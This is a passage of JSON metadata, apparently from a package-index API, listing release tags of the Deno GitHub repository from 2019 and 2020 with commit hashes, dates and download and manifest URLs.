s/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b8